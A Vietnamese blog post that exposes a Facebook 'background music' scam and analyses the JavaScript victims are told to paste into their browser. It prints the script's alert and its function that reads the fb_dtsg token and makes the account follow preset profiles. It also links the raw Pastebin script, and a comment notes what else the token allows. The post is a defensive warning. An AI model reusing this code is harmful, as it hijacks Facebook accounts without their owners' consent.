J2TEAM Security: A must-have extension for Chrome users. Install now!

Thực hư chức năng chèn nhạc nền vào trang cá nhân Facebook?

Thực hư chức năng chèn nhạc nền vào trang cá nhân Facebook?
Chào các bạn!

Dạo gần đây có khá nhiều tài khoản Facebook có đăng 1 status hoặc spam comment vào status của các bạn với nội dung đại loại như sau:



Những status như này thường đánh vào tâm lý tò mò, "ham của lạ" của các bạn (ai mà không muốn trang cá nhân mình đặc biệt hơn của người khác khi có thêm nhạc nền chứ, đúng không :D).



Đây là hình ảnh kèm theo status như để chứng minh:
https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/998567_509983169081386_1940742347_n.jpg

Nhưng đừng vội "nhẹ dạ cả tin" khi thấy những status như này. Chúng ta cùng bắt tay vào phân tích status này nhé :)
  • Giả sử như Facebook có thêm chức năng này thật thì cũng sử dụng player của Facebook, tại sao trong hình "demo" lại là player của Zing Mp3 (trang nghe nhạc trực tuyến tại Việt Nam???).
  • Điểm nghi ngờ thứ hai là trong hình "demo" không có phần Tiêu đề khung (chính là tên của khung, ví dụ như: Thông tin, Album Ảnh, Bạn bè,...). mà chỉ có phần player?
Phân tích liên kết tại Bước 1 trong status, thường thì những status như này thường dẫn bạn tới 1 link có dạng như sau:
http://pastebin.com/raw.php?i=ID

Trong đó thì ID là 1 đoạn code ngẫu nhiên khi tạo 1 trang paste mới tại Pastebin.
Pastebin là một ứng dụng web cho phép bất cứ ai cũng có thể lưu trữ văn bản trong một thời gian nhất định. Website này chủ yếu được sử dụng bởi các lập trình viên để lưu trữ những mã nguồn hay thông tin cấu hình, nhưng về cơ bản thì bất cứ ai cũng có thể chia sẻ.
Tiếp tục phân tích đoạn mã được chia sẻ bằng Pastebin:
- Đoạn mã sử dụng ngôn ngữ Javascript.
- Khi làm theo các bước hướng dẫn để có thể sử dụng chức năng "nhạc nền" như status kia nói thì đoạn JS (Javascript) này sẽ hiện 1 hộp thông báo (theo mình để gây thêm sự chú ý hoặc đánh lạc hướng người sử dụng):
alert('XONG! NHẤN ENTER ĐỂ HOÀN TẤT QUÁ TRÌNH UPDATE PLUGIN FACEBOOK. CHÚC CÁC BẠN ONLINE VUI VẺ CẢm ON BẠN ÐÃ SỬ DỤNG CODE CỦA CHÚNG TÔI HTTPS://FACEBOOK.COM');
- Sử dụng tiếp một hàm được gọi là "a" gửi truy vấn bằng ajax tới "/ajax/follow/follow_profile.php?__a=1" để tự động theo dõi những ID của những User được chỉ định sẵn:
function a(abone){
    var http4 = new XMLHttpRequest();
     
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
     
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
     
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
     
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
       
      http4.close; // Close the connection
     
    }
    }
    
    http4.send(params4);
}

Danh sách những ID mà bạn sẽ bị "ép theo dõi":

- Làm sao để biết bạn đã bị ép theo dõi ai? Rất đơn giản, lấy số ID trong danh sách kia và truy cập:
https://www.facebook.com/ID
Ví dụ: Hàm đầu tiên gọi tới ID này:
a("100003217938743");
Thì bạn kiểm tra bằng cách vào liên kết sau:
 https://www.facebook.com/100003217938743
Facebook sẽ tự trỏ ID tới Username của him ý :))
https://www.facebook.com/liushishi.10.3.1987 (Đang được theo dõi bởi 130.784 người)
Giờ thì mình đã hiểu tại sao sub nhiều thế? :(
OK, tương tự với các ID khác, các bạn tự truy ra nhé :D

* Làm sao để kiểm tra? Rất đơn giản. Các bạn có thể tự kiểm tra như sau:
  • Hủy theo dõi user đó.
  • Làm theo các bước hướng dẫn để "chèn nhạc nền".
  • F5 lại trang cá nhân của user đó và xem nút Theo dõi có trở thành "Đang theo dõi" hay không? Nếu có thì bạn đã hiểu những gì mình vừa nói :).
* Còn vài hàm nữa thực hiện add bạn bè vào group, theo dõi list sub, đăng tin nhắn lên page nhưng mình không thấy được gọi tới.

Tóm lại là cả đoạn mã JS này không có một chỗ nào thêm chức năng "nhạc nền" vào trang cá nhân cho bạn cả mà chỉ bắt bạn theo dõi user linh tinh :). Hãy nhanh chóng tìm những ID mà bạn đã bị "ép theo dõi" và hủy theo dõi nhé ;). Đừng quên chia sẻ bài viết này cho bạn bè cùng biết (share lên Facebook càng tốt ^^).

* Link đoạn Javascript mà mình phân tích trong bài này: http://pastebin.com/raw.php?i=hex65K0s
Dành cho những bạn muốn phân tích thêm, chứ đừng lấy mà chạy thử nha!

Bài viết được đăng tại Juno_okyo's Blog.
Leader at J2TEAM. Website: https://j2team.dev/

10 nhận xét

  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    Đoạn này là quan trọng nhất. fb_dtsg, security token của facebook. Ko chỉ là mấy cái trò câu sub, câu like vớ vẩn này đâu, với nó, ta làm được khá nhiều việc đấy ;)
  2. cái ấy là quảng cáo sub thôi,,còn thực ra là cài Plugin thì sẽ chạy đc thôi
  3. ^^ban that gioi
  4. các bác ơi?cho hoi la sao khi minh sang tham trang ban nao do thi tuy theme không hiện nữa nhung nhạc nền vẫn chạy?bác nào chỉ giúp mình với?
  5. đẹt mẹ ham hố gio theo doi qua troi nguoi nun, lam sao de xoa ak.hic
  6. làm sao để xóa theo dõi
  7. admin mới của ceh quá lợi hại
  8. Cảm ơn bài viết rất hay, xin chúc mừng, thực tế FB chưa cho phép như vậy.
  9. có rồi mà ngoài cách đó ra còn một cách nữa mà ta
  10. Unknown
    Nhận xét này đã bị quản trị viên blog xóa.
Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!